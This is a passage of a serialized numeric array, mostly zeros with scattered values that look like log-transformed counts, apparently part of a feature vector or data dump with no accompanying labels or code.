0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, \n 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 6.515580919909374, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 5.95562797505323, 0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 4.631631038266565, 0, 3.1354942159291497, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.390770307485499, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, \n 3.0910424533583156, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.0794415416798357,\n 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 3.8918202981106265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 1.6094379124341003, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 2.302585092994046, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.4011973816621555, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0, 2.772588722239781, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, \n 4.182806904693496, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 6.976014914136014, \n 0.0, 0, 0.0, 0.0, 0.0, 4.394449154672439, 3.7369991058576035, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 10.06087584278487, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 2.550898738446989, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0,\n 2.5649493574615367, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, \n 2.8398715690385097, 0.0, 0, 0.0, 0.0, 3.5263605246161616, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 4.812184355372417, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0, 0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0,\n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, \n 4.292158018817389, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 